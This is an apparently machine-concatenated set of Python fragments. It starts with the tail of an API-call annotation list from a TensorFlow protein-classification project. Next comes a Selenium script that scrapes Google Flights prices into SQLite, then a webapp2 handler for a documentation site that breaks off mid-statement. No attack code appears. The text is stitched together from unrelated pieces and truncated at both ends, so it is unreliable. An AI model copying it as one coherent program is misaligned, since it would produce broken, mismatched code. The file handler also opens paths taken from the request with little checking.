(['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (13348, 13370), True, 'import numpy as np\n'), ((14127, 14137), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (14135, 14137), True, 'import matplotlib.pyplot as plt\n'), ((14152, 14190), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {'figsize': '(5, 5)', 'dpi': '(200)'}), '(1, figsize=(5, 5), dpi=200)\n', (14162, 14190), True, 'import matplotlib.pyplot as plt\n'), ((14199, 14250), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'color': '"""#005493"""', 'lw': '(2)', 'label': 'legend'}), "(x, y, color='#005493', lw=2, label=legend)\n", (14207, 14250), True, 'import matplotlib.pyplot as plt\n'), ((14362, 14382), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0.0, 1.0]'], {}), '([0.0, 1.0])\n', (14370, 14382), True, 'import matplotlib.pyplot as plt\n'), ((14391, 14412), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.05]'], {}), '([0.0, 1.05])\n', (14399, 14412), True, 'import matplotlib.pyplot as plt\n'), ((14815, 14845), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.svg')"], {}), "(filename + '.svg')\n", (14826, 14845), True, 'import matplotlib.pyplot as plt\n'), ((14852, 14882), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.png')"], {}), "(filename + '.png')\n", (14863, 14882), True, 'import matplotlib.pyplot as plt\n'), ((14889, 14903), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (14898, 14903), True, 'import matplotlib.pyplot as plt\n'), ((17611, 17624), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17622, 17624), False, 'from collections import OrderedDict\n'), ((17652, 17665), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17663, 17665), False, 'from collections import OrderedDict\n'), ((17727, 17740), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17738, 17740), False, 'from collections import OrderedDict\n'), ((18597, 18655), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._nclasses', 'sparse': '(False)'}), '(n_values=self._opts._nclasses, sparse=False)\n', (18610, 18655), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((30565, 30615), 'random.randint', 'random.randint', (['(175)', '(self._opts._windowlength - 10)'], {}), '(175, self._opts._windowlength - 10)\n', (30579, 30615), False, 'import random\n'), ((31748, 31780), 'numpy.zeros', 'np.zeros', (['[self._opts._nclasses]'], {}), '([self._opts._nclasses])\n', (31756, 31780), True, 'import numpy as np\n'), ((31797, 31826), 'numpy.expand_dims', 'np.expand_dims', (['label'], {'axis': '(0)'}), '(label, axis=0)\n', (31811, 31826), True, 'import numpy as np\n'), ((31851, 31866), 'numpy.asarray', 'np.asarray', (['[1]'], {}), '([1])\n', (31861, 31866), True, 'import numpy as np\n'), ((31891, 31928), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (31905, 31928), True, 'import numpy as np\n'), ((32166, 32239), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (32172, 32239), True, 'import numpy as np\n'), ((32261, 32292), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (32273, 32292), True, 'import numpy as np\n'), ((33038, 33139), 'tensorflow.random_normal', 'tf.random_normal', (['[self._opts._batchsize, self._opts._embeddingdim, self._opts._windowlength, 1]'], {}), '([self._opts._batchsize, self._opts._embeddingdim, self.\n _opts._windowlength, 1])\n', (33054, 33139), True, 'import tensorflow as tf\n'), ((33376, 33397), 'tensorflow.stack', 'tf.stack', (['index_batch'], {}), '(index_batch)\n', (33384, 33397), True, 'import tensorflow as tf\n'), ((34314, 34352), 'numpy.ndarray', 'np.ndarray', (['[self._opts._batchsize, 2]'], {}), '([self._opts._batchsize, 2])\n', (34324, 34352), True, 'import numpy as np\n'), ((34371, 34406), 'numpy.ndarray', 'np.ndarray', (['[self._opts._batchsize]'], {}), '([self._opts._batchsize])\n', (34381, 34406), True, 'import numpy as np\n'), ((35866, 35895), 'numpy.stack', 'np.stack', (['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (35874, 35895), True, 'import numpy as np\n'), ((37789, 37820), 'numpy.stack', 'np.stack', (['labels_tensor'], {'axis': '(0)'}), '(labels_tensor, axis=0)\n', (37797, 37820), True, 'import numpy as np\n'), ((37875, 37904), 'numpy.stack', 'np.stack', (['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (37883, 37904), True, 'import numpy as np\n'), ((37921, 37951), 'numpy.expand_dims', 'np.expand_dims', (['batch'], {'axis': '(-1)'}), '(batch, axis=-1)\n', (37935, 37951), True, 'import numpy as np\n'), ((41384, 41413), 'numpy.stack', 'np.stack', (['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (41392, 41413), True, 'import numpy as np\n'), ((41430, 41460), 'numpy.expand_dims', 'np.expand_dims', (['batch'], {'axis': '(-1)'}), '(batch, axis=-1)\n', (41444, 41460), True, 'import numpy as np\n'), ((42903, 42961), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._nclasses', 'sparse': '(False)'}), '(n_values=self._opts._nclasses, sparse=False)\n', (42916, 42961), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((54337, 54367), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (54345, 54367), True, 'import numpy as np\n'), ((54466, 54499), 'numpy.expand_dims', 'np.expand_dims', (['oh_labels'], {'axis': '(0)'}), '(oh_labels, axis=0)\n', (54480, 54499), True, 'import numpy as np\n'), ((55582, 55631), 'random.randint', 'random.randint', (['(175)', '(self._opts._windowlength - 1)'], {}), '(175, self._opts._windowlength - 1)\n', (55596, 55631), False, 'import random\n'), ((56747, 56779), 'numpy.zeros', 'np.zeros', (['[self._opts._nclasses]'], {}), '([self._opts._nclasses])\n', (56755, 56779), True, 'import numpy as np\n'), ((56796, 56825), 'numpy.expand_dims', 'np.expand_dims', (['label'], {'axis': '(0)'}), '(label, axis=0)\n', (56810, 56825), True, 'import numpy as np\n'), ((56850, 56865), 'numpy.asarray', 'np.asarray', (['[1]'], {}), '([1])\n', (56860, 56865), True, 'import numpy as np\n'), ((56890, 56927), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (56904, 56927), True, 'import numpy as np\n'), ((57165, 57238), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (57171, 57238), True, 'import numpy as np\n'), ((57260, 57291), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (57272, 57291), True, 'import numpy as np\n'), ((67873, 67916), 'os.path.join', 'os.path.join', (['save_dir', '"""negative_test.png"""'], {}), "(save_dir, 'negative_test.png')\n", (67885, 67916), False, 'import re, os\n'), ((68242, 68261), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (68255, 68261), True, 'import tensorflow as tf\n'), ((69309, 69328), 'tensorflow.device', 'tf.device', (['"""/cpu:0"""'], {}), "('/cpu:0')\n", (69318, 69328), True, 'import tensorflow as tf\n'), ((69393, 69484), 'tensorflow.get_variable', 'tf.get_variable', (['name', 'shape'], {'initializer': 'initializer', 'dtype': 'dtype', 'trainable': 'trainable'}), '(name, shape, initializer=initializer, dtype=dtype,\n trainable=trainable)\n', (69408, 69484), True, 'import tensorflow as tf\n'), ((70459, 70479), 'numpy.sum', 'np.sum', (['y'], {'axis': 'axis'}), '(y, axis=axis)\n', (70465, 70479), True, 'import numpy as np\n'), ((70764, 70783), 'tarfile.open', 'tarfile.open', (['fname'], {}), '(fname)\n', (70776, 70783), False, 'import tarfile\n'), ((5562, 5596), 'os.path.exists', 'os.path.exists', (['self._summariesdir'], {}), '(self._summariesdir)\n', (5576, 5596), False, 'import re, os\n'), ((5610, 5641), 'os.makedirs', 'os.makedirs', (['self._summariesdir'], {}), '(self._summariesdir)\n', (5621, 5641), False, 'import re, os\n'), ((5657, 5689), 'os.path.exists', 'os.path.exists', (['self._batchesdir'], {}), '(self._batchesdir)\n', (5671, 5689), False, 'import re, os\n'), ((5703, 5732), 'os.makedirs', 'os.makedirs', (['self._batchesdir'], {}), '(self._batchesdir)\n', (5714, 5732), False, 'import re, os\n'), ((5935, 5970), 'json.dump', 'json.dump', (['self.config', 'config_dict'], {}), '(self.config, config_dict)\n', (5944, 5970), False, 'import json\n'), ((7077, 7110), 'os.path.exists', 'os.path.exists', (['self.metrics_path'], {}), '(self.metrics_path)\n', (7091, 7110), False, 'import re, os\n'), ((7124, 7151), 'os.mkdir', 'os.mkdir', (['self.metrics_path'], {}), '(self.metrics_path)\n', (7132, 7151), False, 'import re, os\n'), ((7185, 7231), 'os.path.join', 'os.path.join', (['self.metrics_path', '"""metrics.csv"""'], {}), "(self.metrics_path, 'metrics.csv')\n", (7197, 7231), False, 'import re, os\n'), ((7705, 7814), 'matplotlib.font_manager.FontProperties', 'font_manager.FontProperties', ([], {'fname': '"""/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff"""'}), "(fname=\n '/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff')\n", (7732, 7814), False, 'from matplotlib import font_manager\n'), ((7857, 7968), 'matplotlib.font_manager.FontProperties', 'font_manager.FontProperties', ([], {'fname': '"""/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf"""'}), "(fname=\n '/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf')\n", (7884, 7968), False, 'from matplotlib import font_manager\n'), ((8948, 8996), 'numpy.multiply', 'np.multiply', (['batch_predicted_labels', 'true_labels'], {}), '(batch_predicted_labels, true_labels)\n', (8959, 8996), True, 'import numpy as np\n'), ((9855, 9901), 'os.path.join', 'os.path.join', (['self.metrics_path', '"""metrics.csv"""'], {}), "(self.metrics_path, 'metrics.csv')\n", (9867, 9901), False, 'import re, os\n'), ((11604, 11642), 'numpy.maximum', 'np.maximum', (['(1)', 'self.pred_positives_sum'], {}), '(1, self.pred_positives_sum)\n', (11614, 11642), True, 'import numpy as np\n'), ((11750, 11790), 'numpy.maximum', 'np.maximum', (['(1)', 'self.actual_positives_sum'], {}), '(1, self.actual_positives_sum)\n', (11760, 11790), True, 'import numpy as np\n'), ((11811, 11841), 'numpy.sum', 'np.sum', (['self.true_positive_sum'], {}), '(self.true_positive_sum)\n', (11817, 11841), True, 'import numpy as np\n'), ((11844, 11875), 'numpy.sum', 'np.sum', (['self.pred_positives_sum'], {}), '(self.pred_positives_sum)\n', (11850, 11875), True, 'import numpy as np\n'), ((11893, 11923), 'numpy.sum', 'np.sum', (['self.true_positive_sum'], {}), '(self.true_positive_sum)\n', (11899, 11923), True, 'import numpy as np\n'), ((11926, 11959), 'numpy.sum', 'np.sum', (['self.actual_positives_sum'], {}), '(self.actual_positives_sum)\n', (11932, 11959), True, 'import numpy as np\n'), ((14290, 14353), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, 1]', '[0, 1]'], {'color': '"""#B9B9B9"""', 'lw': '(2)', 'linestyle': '"""--"""'}), "([0, 1], [0, 1], color='#B9B9B9', lw=2, linestyle='--')\n", (14298, 14353), True, 'import matplotlib.pyplot as plt\n'), ((14448, 14490), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontproperties': 'self.font'}), '(title, fontproperties=self.font)\n', (14457, 14490), True, 'import matplotlib.pyplot as plt\n'), ((14503, 14546), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xname'], {'fontproperties': 'self.font'}), '(xname, fontproperties=self.font)\n', (14513, 14546), True, 'import matplotlib.pyplot as plt\n'), ((14559, 14602), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yname'], {'fontproperties': 'self.font'}), '(yname, fontproperties=self.font)\n', (14569, 14602), True, 'import matplotlib.pyplot as plt\n'), ((14615, 14660), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower right"""', 'prop': 'self.font'}), "(loc='lower right', prop=self.font)\n", (14625, 14660), True, 'import matplotlib.pyplot as plt\n'), ((14687, 14703), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (14696, 14703), True, 'import matplotlib.pyplot as plt\n'), ((14716, 14733), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xname'], {}), '(xname)\n', (14726, 14733), True, 'import matplotlib.pyplot as plt\n'), ((14746, 14763), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yname'], {}), '(yname)\n', (14756, 14763), True, 'import matplotlib.pyplot as plt\n'), ((14776, 14805), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower right"""'}), "(loc='lower right')\n", (14786, 14805), True, 'import matplotlib.pyplot as plt\n'), ((18928, 18983), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._depth', 'sparse': '(False)'}), '(n_values=self._opts._depth, sparse=False)\n', (18941, 18983), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((26190, 26263), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (26196, 26263), True, 'import numpy as np\n'), ((26296, 26327), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (26308, 26327), True, 'import numpy as np\n'), ((30453, 30473), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (30467, 30473), False, 'import random\n'), ((30855, 30875), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (30869, 30875), False, 'import random\n'), ((31251, 31276), 'math.ceil', 'math.ceil', (['(length / AA_nr)'], {}), '(length / AA_nr)\n', (31260, 31276), False, 'import math\n'), ((33204, 33246), 'numpy.random.randint', 'np.random.randint', (['(1)', 'self._opts._nclasses'], {}), '(1, self._opts._nclasses)\n', (33221, 33246), True, 'import numpy as np\n'), ((33308, 33326), 'tensorflow.constant', 'tf.constant', (['label'], {}), '(label)\n', (33319, 33326), True, 'import tensorflow as tf\n'), ((44040, 44095), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._depth', 'sparse': '(False)'}), '(n_values=self._opts._depth, sparse=False)\n', (44053, 44095), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((49630, 49703), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (49636, 49703), True, 'import numpy as np\n'), ((49736, 49767), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (49748, 49767), True, 'import numpy as np\n'), ((51381, 51402), 'numpy.ones', 'np.ones', (['[seq_length]'], {}), '([seq_length])\n', (51388, 51402), True, 'import numpy as np\n'), ((51539, 51580), 're.sub', 're.sub', (['"""[\'\\\\[\\\\]\\\\(]"""', '""""""', 'structure_str'], {}), '("[\'\\\\[\\\\]\\\\(]", \'\', structure_str)\n', (51545, 51580), False, 'import re, os\n'), ((52087, 52156), 'numpy.pad', 'np.pad', (['structure'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(structure, pad_width=npad, mode='constant', constant_values=0)\n", (52093, 52156), True, 'import numpy as np\n'), ((52288, 52324), 'numpy.zeros', 'np.zeros', (['[self._opts._windowlength]'], {}), '([self._opts._windowlength])\n', (52296, 52324), True, 'import numpy as np\n'), ((55502, 55522), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (55516, 55522), False, 'import random\n'), ((55854, 55874), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (55868, 55874), False, 'import random\n'), ((56250, 56275), 'math.ceil', 'math.ceil', (['(length / AA_nr)'], {}), '(length / AA_nr)\n', (56259, 56275), False, 'import math\n'), ((59449, 59487), 'tensorflow.python_io.TFRecordWriter', 'tf.python_io.TFRecordWriter', (['file_path'], {}), '(file_path)\n', (59476, 59487), True, 'import tensorflow as tf\n'), ((68276, 68302), 'tensorflow.name_scope', 'tf.name_scope', (['"""summaries"""'], {}), "('summaries')\n", (68289, 68302), True, 'import tensorflow as tf\n'), ((68323, 68342), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['var'], {}), '(var)\n', (68337, 68342), True, 'import tensorflow as tf\n'), ((68355, 68410), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""mean"""', 'mean'], {'collections': 'collection'}), "('mean', mean, collections=collection)\n", (68372, 68410), True, 'import tensorflow as tf\n'), ((68537, 68596), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""stddev"""', 'stddev'], {'collections': 'collection'}), "('stddev', stddev, collections=collection)\n", (68554, 68596), True, 'import tensorflow as tf\n'), ((68771, 68833), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['"""histogram"""', 'var'], {'collections': 'collection'}), "('histogram', var, collections=collection)\n", (68791, 68833), True, 'import tensorflow as tf\n'), ((70318, 70338), 'numpy.max', 'np.max', (['y'], {'axis': 'axis'}), '(y, axis=axis)\n', (70324, 70338), True, 'import numpy as np\n'), ((5848, 5900), 'os.path.join', 'os.path.join', (['self._summariesdir', '"""config_dict.JSON"""'], {}), "(self._summariesdir, 'config_dict.JSON')\n", (5860, 5900), False, 'import re, os\n'), ((10399, 10430), 'numpy.reshape', 'np.reshape', (['self.roc_labels', '(-1)'], {}), '(self.roc_labels, -1)\n', (10409, 10430), True, 'import numpy as np\n'), ((10499, 10529), 'numpy.reshape', 'np.reshape', (['self.roc_score', '(-1)'], {}), '(self.roc_score, -1)\n', (10509, 10529), True, 'import numpy as np\n'), ((10685, 10716), 'numpy.reshape', 'np.reshape', (['self.roc_labels', '(-1)'], {}), '(self.roc_labels, -1)\n', (10695, 10716), True, 'import numpy as np\n'), ((10732, 10762), 'numpy.reshape', 'np.reshape', (['self.roc_score', '(-1)'], {}), '(self.roc_score, -1)\n', (10742, 10762), True, 'import numpy as np\n'), ((12546, 12636), 'os.path.join', 'os.path.join', (['self.metrics_path', "(self._opts._name + '.roc_%d' % self.num_calculations)"], {}), "(self.metrics_path, self._opts._name + '.roc_%d' % self.\n num_calculations)\n", (12558, 12636), False, 'import re, os\n'), ((12949, 13045), 'os.path.join', 'os.path.join', (['self.metrics_path', "(self._opts._name + '.precision_%d' % self.num_calculations)"], {}), "(self.metrics_path, self._opts._name + '.precision_%d' % self.\n num_calculations)\n", (12961, 13045), False, 'import re, os\n'), ((25533, 25591), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'self._opts._windowlength', 'dtype': 'np.int32'}), '(shape=self._opts._windowlength, dtype=np.int32)\n', (25543, 25591), True, 'import numpy as np\n'), ((31990, 32014), 'numpy.reshape', 'np.reshape', (['seq', '(1, -1)'], {}), '(seq, (1, -1))\n', (32000, 32014), True, 'import numpy as np\n'), ((33449, 33480), 'tensorflow.cast', 'tf.cast', (['label_tensor', 'tf.int32'], {}), '(label_tensor, tf.int32)\n', (33456, 33480), True, 'import tensorflow as tf\n'), ((37722, 37735), 'numpy.float32', 'np.float32', (['l'], {}), '(l)\n', (37732, 37735), True, 'import numpy as np\n'), ((39928, 39986), 'math.ceil', 'math.ceil', (['(self._opts._batchsize * self.garbage_percentage)'], {}), '(self._opts._batchsize * self.garbage_percentage)\n', (39937, 39986), False, 'import math\n'), ((48936, 48994), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'self._opts._windowlength', 'dtype': 'np.int32'}), '(shape=self._opts._windowlength, dtype=np.int32)\n', (48946, 48994), True, 'import numpy as np\n'), ((56989, 57013), 'numpy.reshape', 'np.reshape', (['seq', '(1, -1)'], {}), '(seq, (1, -1))\n', (56999, 57013), True, 'import numpy as np\n'), ((57421, 57454), 'tensorflow.train.BytesList', 'tf.train.BytesList', ([], {'value': '[value]'}), '(value=[value])\n', (57439, 57454), True, 'import tensorflow as tf\n'), ((57537, 57570), 'tensorflow.train.FloatList', 'tf.train.FloatList', ([], {'value': '[value]'}), '(value=[value])\n', (57555, 57570), True, 'import tensorflow as tf\n'), ((57653, 57686), 'tensorflow.train.Int64List', 'tf.train.Int64List', ([], {'value': '[value]'}), '(value=[value])\n', (57671, 57686), True, 'import tensorflow as tf\n'), ((58583, 58622), 'os.path.basename', 'os.path.basename', (['self._opts._traindata'], {}), '(self._opts._traindata)\n', (58599, 58622), False, 'import re, os\n'), ((58897, 58936), 'os.path.basename', 'os.path.basename', (['self._opts._validdata'], {}), '(self._opts._validdata)\n', (58913, 58936), False, 'import re, os\n'), ((68428, 68451), 'tensorflow.name_scope', 'tf.name_scope', (['"""stddev"""'], {}), "('stddev')\n", (68441, 68451), True, 'import tensorflow as tf\n'), ((68634, 68652), 'tensorflow.reduce_max', 'tf.reduce_max', (['var'], {}), '(var)\n', (68647, 68652), True, 'import tensorflow as tf\n'), ((68715, 68733), 'tensorflow.reduce_min', 'tf.reduce_min', (['var'], {}), '(var)\n', (68728, 68733), True, 'import tensorflow as tf\n'), ((25949, 25980), 'numpy.reshape', 'np.reshape', (['seq_matrix', '(1, -1)'], {}), '(seq_matrix, (1, -1))\n', (25959, 25980), True, 'import numpy as np\n'), ((31082, 31103), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31096, 31103), False, 'import random\n'), ((31549, 31570), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31563, 31570), False, 'import random\n'), ((31677, 31698), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (31691, 31698), False, 'import random\n'), ((49352, 49383), 'numpy.reshape', 'np.reshape', (['seq_matrix', '(1, -1)'], {}), '(seq_matrix, (1, -1))\n', (49362, 49383), True, 'import numpy as np\n'), ((56081, 56102), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (56095, 56102), False, 'import random\n'), ((56548, 56569), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (56562, 56569), False, 'import random\n'), ((56676, 56697), 'random.randint', 'random.randint', (['(0)', '(19)'], {}), '(0, 19)\n', (56690, 56697), False, 'import random\n'), ((59353, 59407), 'os.path.join', 'os.path.join', (['self._opts._batchesdir', 'batch_files_name'], {}), '(self._opts._batchesdir, batch_files_name)\n', (59365, 59407), False, 'import re, os\n'), ((59833, 59869), 'numpy.zeros', 'np.zeros', (['[self._opts._windowlength]'], {}), '([self._opts._windowlength])\n', (59841, 59869), True, 'import numpy as np\n'), ((62176, 62191), 'numpy.asarray', 'np.asarray', (['[0]'], {}), '([0])\n', (62186, 62191), True, 'import numpy as np\n'), ((62246, 62283), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (62260, 62283), True, 'import numpy as np\n'), ((68501, 68522), 'tensorflow.square', 'tf.square', (['(var - mean)'], {}), '(var - mean)\n', (68510, 68522), True, 'import tensorflow as tf\n')] |
#!/usr/bin/env python3
from time import sleep
import datetime
from selenium import webdriver
from bs4 import BeautifulSoup
import sqlite3
DATEFORMAT = '%Y-%m-%d'
def buildQueryURL(fr, to, date, currency):
url = 'https://www.google.com/flights?hl=se&gl=se#flt={fr}.{to}.{date};c:{currency};e:1;s:0;sd:1;t:f;tt:o'
url = url.format(fr = fr, to = to, date = date, currency = currency)
return url
def getHTML(url):
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument('no-sandbox')
driver = webdriver.Chrome(chrome_options = options)
driver.get(url)
sleep(2)
html = driver.page_source
driver.quit()
return html
def parseFlights(html, date):
def parsePrice(price):
return ''.join([i for i in price if i.isdigit()])
def parseTimes(times, date):
return [datetime.datetime.strptime(date + '-' + time.strip(), DATEFORMAT + '-%H:%M') for time in times.split('–')]
flightsSoup = BeautifulSoup(html, features = 'html.parser')
for flight in flightsSoup.find_all('li', class_ = 'gws-flights-results__result-item'):
times = parseTimes(flight.find('div', class_ = 'gws-flights-results__times').text, date)
priceObj = flight.find('div', class_ = 'gws-flights-results__price')
yield {
'flightId': flight['data-fp'],
'flightDate': datetime.datetime.strptime(date, DATEFORMAT),
'departure': times[0],
'arrival': times[1],
'duration': flight.find('div', class_ = 'gws-flights-results__duration').text,
'price': -1 if (priceObj is None) else parsePrice(priceObj.text),
'timestamp': datetime.datetime.now()
}
def connectDB(dbName):
db = sqlite3.connect(dbName)
cur = db.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS flights(
id INTEGER PRIMARY KEY AUTOINCREMENT,
flightId TEXT,
flightDate DATETIME,
departure DATETIME,
arrival DATETIME,
duration TEXT,
price INTEGER,
timestamp DATETIME)
''')
db.commit()
return db
def writeFlights(db, flights):
cur = db.cursor()
for flight in flights:
print('Writing to db...\n', flight)
cur.execute('''
INSERT INTO flights(flightId, flightDate, departure, arrival, duration, price, timestamp)
VALUES(:flightId, :flightDate, :departure, :arrival, :duration, :price, :timestamp)
''', flight)
db.commit()
def main():
dateRange = [datetime.datetime.now().strftime(DATEFORMAT), '2020-12-31']
dateRangeDateFormat = [datetime.datetime.strptime(date, DATEFORMAT) for date in dateRange]
currentDate = dateRangeDateFormat[0]
while (currentDate <= dateRangeDateFormat[1]):
date = currentDate.strftime(DATEFORMAT)
url = buildQueryURL('ARN', 'FRA', date, 'SEK')
print('Scraping', url)
html = getHTML(url)
flights = parseFlights(html, date)
db = connectDB('./db/flights.sqlite')
with db:
writeFlights(db, flights)
currentDate += datetime.timedelta(days = 1)
if __name__ == '__main__':
main()
| [
"selenium.webdriver.ChromeOptions",
"sqlite3.connect",
"datetime.datetime.strptime",
"selenium.webdriver.Chrome",
"time.sleep",
"bs4.BeautifulSoup",
"datetime.datetime.now",
"datetime.timedelta"
] | [((434, 459), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (457, 459), False, 'from selenium import webdriver\n'), ((543, 583), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'options'}), '(chrome_options=options)\n', (559, 583), False, 'from selenium import webdriver\n'), ((606, 614), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (611, 614), False, 'from time import sleep\n'), ((953, 996), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html'], {'features': '"""html.parser"""'}), "(html, features='html.parser')\n", (966, 996), False, 'from bs4 import BeautifulSoup\n'), ((1662, 1685), 'sqlite3.connect', 'sqlite3.connect', (['dbName'], {}), '(dbName)\n', (1677, 1685), False, 'import sqlite3\n'), ((2481, 2525), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date', 'DATEFORMAT'], {}), '(date, DATEFORMAT)\n', (2507, 2525), False, 'import datetime\n'), ((2928, 2954), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (2946, 2954), False, 'import datetime\n'), ((1323, 1367), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date', 'DATEFORMAT'], {}), '(date, DATEFORMAT)\n', (1349, 1367), False, 'import datetime\n'), ((1601, 1624), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1622, 1624), False, 'import datetime\n'), ((2396, 2419), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2417, 2419), False, 'import datetime\n')] |
import os
import re
import jinja2
import webapp2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
variable_start_string='{{{{',
variable_end_string='}}}}',
autoescape=True)
redirects = [
(r'/api/([^/]*)/lit_html', r'/api/\1/_lit_html_'),
(r'/api/([^/]*)/shady_render', r'/api/\1/_lib_shady_render_')
]
# Match HTML pages from path; similar to behavior of Jekyll on GitHub Pages.
def find_template(path):
if path.endswith('/'):
# / -> /index.html, /try/ -> /try/index.html
return JINJA_ENVIRONMENT.get_template(path + 'index.html')
elif path.endswith('.html'):
# /index.html, /try/create.html
return JINJA_ENVIRONMENT.get_template(path)
try:
# /try/create -> /try/create.html
return JINJA_ENVIRONMENT.get_template(path + '.html')
except jinja2.exceptions.TemplateNotFound:
pass
# /try -> /try/index.html
return JINJA_ENVIRONMENT.get_template(path + '/index.html')
class MainPage(webapp2.RequestHandler):
def get(self):
try:
template = find_template(self.request.path)
self.response.headers['Cache-Control'] = 'public, max-age=60'
except jinja2.exceptions.TemplateNotFound:
template = find_template('/404.html')
self.response.set_status(404)
except Exception:
template = find_template('/500.html')
self.response.set_status(500)
self.response.write(template.render({}))
# Serve redirects for old paths, otherwise just serve static files
class ApiDoc(webapp2.RequestHandler):
def redirect_if_needed(self, path):
for redirect in redirects:
pattern = redirect[0]
replace = redirect[1]
if re.match(pattern, path):
self.redirect(re.sub(pattern, replace, path), permanent=True)
return True
return False
def get(self):
if self.redirect_if_needed(self.request.path):
return
try:
# path is always absolute starting with /api/. Slice off the leading slash
# and normalize it relative to cwd
filepath = os.path.relpath(self.request.path[1:])
page = open(filepath, 'rb').read()
self.response.write(page)
except Exception:
